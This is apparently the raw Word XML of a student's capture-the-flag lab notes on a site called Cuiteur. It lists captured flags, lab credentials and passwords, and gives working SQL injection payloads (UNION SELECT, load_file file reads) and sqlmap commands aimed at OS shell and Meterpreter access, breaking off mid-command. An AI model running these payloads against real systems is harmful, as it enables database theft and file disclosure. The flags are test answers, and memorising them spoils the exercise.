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513C" w14:textId="3014C70F" w:rsidR="00F15547" w:rsidRPr="004B0558" w:rsidRDefault="00450E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kali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kali</w:t>
      </w:r>
      <w:r w:rsidR="00F15547" w:rsidRPr="004B0558">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OBTAINED</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F15547" w:rsidRPr="004B0558">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FLAGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346F327A" w14:textId="7F20048F" w:rsidR="00F15547" w:rsidRDefault="00F15547" w:rsidP="00F155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15547">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10c26e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB9B15" w14:textId="77777777" w:rsidR="00F15547" w:rsidRPr="00F15547" w:rsidRDefault="00F15547" w:rsidP="00F1554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15547">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag{10c26ecfa126f98a4ca603924046796780d3b45052a9c1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5BDF75" w14:textId="4884A72E" w:rsidR="00F15547" w:rsidRPr="00A83ACD" w:rsidRDefault="00F15547" w:rsidP="00F1554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F15547">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15547">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ninjor@10.0.2.88 -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15547">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>StrictHostKeyChecking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15547">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E7D8F" w14:textId="668D934F" w:rsidR="00A83ACD" w:rsidRPr="00A83ACD" w:rsidRDefault="00A83ACD" w:rsidP="00A83A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521bce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60593402" w14:textId="7EB76835" w:rsidR="00A83ACD" w:rsidRDefault="00A83ACD" w:rsidP="00A83AC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3ACD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag{521bce090e5b9e19a5e7c2ec9642f27e1d641c5fd72aad}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66210444" w14:textId="38D0F14B" w:rsidR="00F15547" w:rsidRPr="00A83ACD" w:rsidRDefault="00000000" w:rsidP="00A83AC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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00A83ACD" w:rsidRPr="00817083">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.0.3.107/php/recherche_old.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F402639" w14:textId="6A971E99" w:rsidR="00B978CD" w:rsidRPr="00B978CD" w:rsidRDefault="00A83ACD" w:rsidP="00B978CD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Source code has flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574AD03" w14:textId="2089319C" w:rsidR="00022A6A" w:rsidRDefault="00B978CD" w:rsidP="00022A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acdb1f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A40E1AC" w14:textId="2F06A42B" w:rsidR="00B978CD" w:rsidRPr="00B978CD" w:rsidRDefault="00000000" w:rsidP="00B978C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hyperlink w:history="1">
        <w:r w:rsidR="00B978CD" w:rsidRPr="00577AB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>ftp 10.0.2.164</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47117F8D" w14:textId="67D6202F" w:rsidR="00B978CD" w:rsidRPr="00A845B7" w:rsidRDefault="00A845B7" w:rsidP="00B978C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Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D8BCF" w14:textId="01DF8836" w:rsidR="00A845B7" w:rsidRPr="00A845B7" w:rsidRDefault="00A845B7" w:rsidP="00A845B7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Username: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB37BF5" w14:textId="024BC8B9" w:rsidR="00A845B7" w:rsidRPr="00A845B7" w:rsidRDefault="00A845B7" w:rsidP="00A845B7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Password: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30600C98" w14:textId="6C92CC4E" w:rsidR="00A845B7" w:rsidRPr="00D477BF" w:rsidRDefault="00A845B7" w:rsidP="00A845B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mget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B4B742" w14:textId="0FF5B327" w:rsidR="00D477BF" w:rsidRDefault="00D477BF" w:rsidP="00D477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de3b1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE69604" w14:textId="144401EB" w:rsidR="00D477BF" w:rsidRDefault="00D477BF" w:rsidP="00D477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7BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag{de3b1c4c483a24fb05b1552e93e856124ac05209dc1f0a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A3E1C" w14:textId="7630025D" w:rsidR="00D477BF" w:rsidRDefault="00D477BF" w:rsidP="00D477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SQL injection on </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00894405">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.0.3.107/php/recherche_old.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="641A0C61" w14:textId="66505E7E" w:rsidR="00D477BF" w:rsidRPr="006B53A1" w:rsidRDefault="00D477BF" w:rsidP="006B53A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477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 0 AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flag_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usPseudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, flag AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usNom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0 AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usAvecPhoto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM flags; -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D477BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AB7129A" w14:textId="76129A4C" w:rsidR="00CB32D1" w:rsidRPr="00CB32D1" w:rsidRDefault="00CB32D1" w:rsidP="00CB32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CRASH COURSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F5BF2" w14:textId="3E5B171F" w:rsidR="00CB32D1" w:rsidRPr="00CB32D1" w:rsidRDefault="00B60378" w:rsidP="00CB32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32D1" w:rsidRPr="00CB32D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@10.0.2.233 -p 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589BBD8" w14:textId="5010F2CC" w:rsidR="00CB32D1" w:rsidRDefault="00CB32D1" w:rsidP="00CB32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Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706D94E" w14:textId="42D276A3" w:rsidR="00181E25" w:rsidRDefault="00181E25" w:rsidP="00181E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2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00181E25">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B1r7uI3:suVm:-XX1vql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E19F8" w14:textId="484E5C6C" w:rsidR="00181E25" w:rsidRDefault="00181E25" w:rsidP="00181E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3: </w:t>
      </w:r>
      <w:r w:rsidRPr="00181E25">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T0hmthk.2rqbJFDH8jIx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C7873" w14:textId="7AE97C72" w:rsidR="00F53075" w:rsidRDefault="00F53075" w:rsidP="00181E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4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F53075">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>me.opv.s0P-79Vxz9iVw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A581720" w14:textId="4270F6D7" w:rsidR="00886058" w:rsidRDefault="00886058" w:rsidP="00181E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5: </w:t>
      </w:r>
      <w:r w:rsidRPr="00886058">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE2C752" w14:textId="4E09AC70" w:rsidR="00F53075" w:rsidRDefault="0016757F" w:rsidP="000347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6: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016757F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RNEdWBPavTFpmlja6_HC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642934EE" w14:textId="37DA8E60" w:rsidR="00DF65D3" w:rsidRDefault="00DF65D3" w:rsidP="000347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7: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF65D3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iV77Aa:Ycx6FP47NWsXo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335B40D" w14:textId="3F3BE871" w:rsidR="000347B6" w:rsidRDefault="000347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510A98" w14:textId="2369F577" w:rsidR="000347B6" w:rsidRDefault="000347B6" w:rsidP="00034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NOTABLE ADDRESSES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA9792" w14:textId="3FA8B5A1" w:rsidR="00086D97" w:rsidRPr="00086D97" w:rsidRDefault="00086D97" w:rsidP="000347B6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D42DF9" w14:textId="464CBAF4" w:rsidR="00086D97" w:rsidRDefault="00086D97" w:rsidP="000347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0C99E7" wp14:editId="4D78EC76">
            <wp:extent cx="5267325" cy="34861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937" w14:textId="77777777" w:rsidR="00D7624F" w:rsidRDefault="00D7624F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7624F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016FF4B7" w14:textId="3954B350" w:rsidR="00D7624F" w:rsidRPr="00D7624F" w:rsidRDefault="002C44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6FE420" wp14:editId="3C8F4DDB">
            <wp:extent cx="5895975" cy="19526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4E" w:rsidRPr="00D7624F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C27C896" w14:textId="21A0617B" w:rsidR="00086D97" w:rsidRDefault="000A644E" w:rsidP="00034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Hacking path…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C4C84" w14:textId="2F3EBAA4" w:rsidR="0045509B" w:rsidRDefault="0045509B" w:rsidP="000A64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Cuiteur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8672E" w14:textId="7527A2C5" w:rsidR="000A644E" w:rsidRDefault="000A644E" w:rsidP="00455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Found open port 80 on 10.0.3.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF145F3" w14:textId="7AFB4DB0" w:rsidR="000A644E" w:rsidRDefault="000A644E" w:rsidP="004550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Cuiteur website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E04F54" w14:textId="4D24EB8F" w:rsidR="00563280" w:rsidRDefault="00563280" w:rsidP="004550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Ports open are also 22 (SSH) and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB69704" w14:textId="7AC7B51C" w:rsidR="00563280" w:rsidRDefault="00563280" w:rsidP="00455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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on search bar and found comment with deprecated vulnerable search bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7BFF83" w14:textId="2F863A0E" w:rsidR="008E6989" w:rsidRDefault="008E6989" w:rsidP="0045509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E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;!-- old page &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> id="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>btnCherche</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>recherche_old.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6989">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" title="Search for Users to Follow"&gt;&lt;/a&gt;--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6DF317" w14:textId="35A3AF0C" w:rsidR="008E6989" w:rsidRDefault="008E6989" w:rsidP="00455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 SQL injection on old search bar (‘ OR 1=1) and got to “Welcome to the Matrix” page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F2245" w14:textId="773D291E" w:rsidR="00541FF3" w:rsidRDefault="00014378" w:rsidP="0045509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014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 0 AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, TABLE_NAME AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usPseudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, TABLE_SCHEMA AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usNom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0 AS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usAvecPhoto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM INFORMATION_SCHEMA.TABLES; -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014378">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40C16F71" w14:textId="3D607583" w:rsidR="0045509B" w:rsidRDefault="00541FF3" w:rsidP="0045509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Returns all table names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888FCBB" w14:textId="282D079C" w:rsidR="0045509B" w:rsidRDefault="0045509B" w:rsidP="004550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F9C4EE6" wp14:editId="70D14ABC">
            <wp:extent cx="1683276" cy="391477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340" cy="39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A225" w14:textId="0DB2145E" w:rsidR="0045509B" w:rsidRDefault="0045509B" w:rsidP="0045509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tables where TABLE_SCHEMA=’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cuiteur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C41F9C" w14:textId="4144DBB5" w:rsidR="00E92D99" w:rsidRDefault="00D477BF" w:rsidP="00E92D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Selected all the columns from the table “flags” to find columns “flag” and “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>flagId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”, then selected those and found flag de3b1c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FED6A6" w14:textId="77777777" w:rsidR="00BF1371" w:rsidRDefault="00BF1371" w:rsidP="00BF13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 SQL map on page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8DFBF8" w14:textId="6160E8AD" w:rsidR="00BF1371" w:rsidRDefault="00450EE6" w:rsidP="00BF13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BF1371" w:rsidRPr="00BF1371">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF1371" w:rsidRPr="00BF1371">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://10.0.3.107/php/recherche_old.php --cookie='PHPSESSID=</w:t>
      </w:r>
      <w:r w:rsidR="00BF1371">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[COOKIE HERE]</w:t>
      </w:r>
      <w:r w:rsidR="00BF1371" w:rsidRPr="00BF1371">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' --data="recherche=1" --schema </w:t>
      </w:r>
      <w:r w:rsidR="00B81BA2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00BF1371" w:rsidRPr="00BF1371">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4EEBB" w14:textId="5D649B33" w:rsidR="002B38C3" w:rsidRPr="002B38C3" w:rsidRDefault="002B38C3" w:rsidP="002B38C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3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FOR </w:t>
      </w:r>
      <w:r w:rsidR="003F3761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>OS SHELL ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6BD66" w14:textId="04559F56" w:rsidR="00B81BA2" w:rsidRDefault="00D751EB" w:rsidP="00BF13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CA0CB6" wp14:editId="0FBE3337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442844" cy="2522767"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21372"/>
                <wp:lineTo x="21523" y="21372"/>
                <wp:lineTo x="21523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44" cy="2522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BA2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Got passwords for most users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE4CC1" w14:textId="4CFD1F22" w:rsidR="0061171C" w:rsidRDefault="0061171C" w:rsidP="006117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Found out you can run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access files from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95CE17" w14:textId="77777777" w:rsidR="00904867" w:rsidRDefault="0061171C" w:rsidP="0090486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61171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 0 as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>load_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("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</w:t>
      </w:r>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"), 3 FROM users; -- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0061171C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16A0AD74" w14:textId="54419F70" w:rsidR="00904867" w:rsidRDefault="004C0D91" w:rsidP="009048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Meterpreter on the OS</w:t>
      </w:r>
      <w:r w:rsidR="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB87432" w14:textId="360EDD1B" w:rsidR="00904867" w:rsidRDefault="00AE7CC4" w:rsidP="009048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04867" w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00904867" w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
